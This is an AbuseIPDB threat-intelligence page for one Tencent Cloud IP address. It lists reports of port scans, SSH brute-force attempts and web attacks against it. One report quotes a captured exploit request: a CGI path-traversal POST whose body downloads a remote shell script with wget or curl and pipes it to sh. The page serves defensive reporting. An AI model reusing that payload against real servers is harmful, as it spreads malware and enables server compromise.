JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 119.45.115.148

119.45.115.148 was found in our database!

This IP was reported 41 times. Confidence of Abuse is 43%: ?

43%

ISP	Tencent cloud computing (Beijing) Co., Ltd.
Usage Type	Data Center/Web Hosting/Transit
ASN	AS45090
Domain Name	tencentcloud.com
Country	🇨🇳 China
City	Nanjing, Jiangsu

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 119.45.115.148

Whois 119.45.115.148

IP Abuse Reports for 119.45.115.148:

This IP address has been reported a total of 41 times from 23 distinct sources. 119.45.115.148 was first reported on April 14th 2026, and the most recent report was 1 month ago.

Old Reports: The most recent abuse report for this IP address is from 1 month ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇬🇧 andypiper	2026-05-01 01:01:37 (1 month ago)	CrowdSec ban for AbuseIPDB Top List	Brute-Force Web App Attack
🇨🇭 YF	2026-05-01 00:14:48 (1 month ago)	Pays blacklisté (CN) — refresh	Brute-Force Web App Attack
🇨🇳 ThreatBook.io	2026-04-28 00:45:53 (1 month ago)	ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/119.45.115.148 2026-04-2 ... show more ThreatBook Intelligence: Dynamic IP more details on http://threatbook.io/ip/119.45.115.148 2026-04-27 02:11:33 /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh,{"body":"(wget --no-check-certificate -qO- https://204.76.203.196/sh \|\| curl -sk https://204.76.203.196/sh) \| sh -s apache.selfrep","content_type":"text/plain","header":{"Accept":["/"],"Connection":["keep-alive"],"Content-Length":["121"],"Content-Type":["text/plain"],"Upgrade-Insecure-Requests":["1"],"User-Agent":["libredtail-http"],"X-Forwarded-For":["119.45.115.148"]},"host":"58.247.153.152:443","method":"POST","proto":"HTTP/1.1","remote_addr":"10.90.104.90:30721","status_code":200,"url":"/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh","user_agent":"libredtail-http"} show less	Web App Attack
🇦🇹 urnilxfgbez	2026-04-27 22:45:00 (1 month ago)	Last 24 Hours suspicious: (DPT=445\|DPT=3389\|DPT=22\|DPT=3306\|DPT=8080\|DPT=23\|DPT=5900\|DPT=1433)	Port Scan
🇺🇸 Hydrated8853	2026-04-27 02:55:20 (1 month ago)	2026-04-27T10:52:44.002052+08:00 qq sshd[1270471]: Invalid user orangepi from 119.45.115.148 port 53 ... show more 2026-04-27T10:52:44.002052+08:00 qq sshd[1270471]: Invalid user orangepi from 119.45.115.148 port 53214 2026-04-27T10:52:44.022702+08:00 qq sshd[1270471]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.45.115.148 2026-04-27T10:52:45.809030+08:00 qq sshd[1270471]: Failed password for invalid user orangepi from 119.45.115.148 port 53214 ssh2 2026-04-27T10:53:21.218329+08:00 qq sshd[1270473]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=119.45.115.148 user=root 2026-04-27T10:53:23.753122+08:00 qq sshd[1270473]: Failed password for root from 119.45.115.148 port 40216 ssh2 ... show less	Brute-Force SSH
🇺🇸 MPL	2026-04-27 01:36:07 (1 month ago)	tcp/22 (2 or more attempts)	Port Scan
Anonymous	2026-04-26 18:01:11 (1 month ago)	Unauthorized connection attempt on Port 23	Port Scan Hacking Exploited Host
🇩🇪 centurion	2026-04-26 14:02:35 (1 month ago)	Blocked by UFW on ns02 [23/tcp] Source port: 56996 TTL: 47 Packet length: 40 TOS: 0x00 This report ... show more Blocked by UFW on ns02 [23/tcp] Source port: 56996 TTL: 47 Packet length: 40 TOS: 0x00 This report was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan Hacking Brute-Force
🇹🇭 Sawasdee	2026-04-26 13:51:12 (1 month ago)	Unwanted checking 80 or 443 port ...	Bad Web Bot
Anonymous	2026-04-26 09:04:17 (1 month ago)	IP & Port Scan.	SSH Port Scan Brute-Force
🇫🇷 security.rdmc.fr	2026-04-26 07:35:52 (1 month ago)	Port Scan Attack proto:TCP src:42072 dst:23	Port Scan
🇺🇸 MPL	2026-04-26 06:38:41 (1 month ago)	tcp/443 (4 or more attempts)	Port Scan
🇺🇸 donarev419	2026-04-26 06:26:01 (1 month ago)	Connection to port 2375 with data transfer. Data preview: GET /containers/json HTTP/1.1 Host: 107.1 ... show more Connection to port 2375 with data transfer. Data preview: GET /containers/json HTTP/1.1 Host: 107.175.212.44:2375 Upgrade-Insecure-Requests: 1 Accept: / show less	Port Scan Hacking
🇦🇺 trentwiles.com	2026-04-26 02:39:07 (1 month ago)	Unauthorized connection attempt detected from IP address 119.45.115.148 to port 443 [SYD]	Port Scan
🇺🇸 MPL	2026-04-26 02:05:08 (1 month ago)	tcp/443 (2 or more attempts)	Port Scan

Showing 1 to 15 of 41 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 178.156.253.13

🇺🇸 147.185.132.100

🇮🇳 117.245.138.2

🇷🇺 46.191.163.43

🇹🇼 111.70.22.152

🇺🇸 47.251.167.155

🇳🇱 213.177.179.62

🇺🇿 185.203.236.212

🇷🇺 178.178.194.126

🇧🇷 152.32.200.243

🇰🇷 61.72.145.120

🇩🇪 207.154.230.149

🇳🇱 176.65.139.222

🇰🇷 175.119.225.68

🇺🇸 165.154.135.73

🇺🇸 74.196.127.84

🇺🇸 52.71.170.250

🇨🇳 36.41.173.197

🇲🇽 187.141.71.166

🇺🇸 172.253.2.17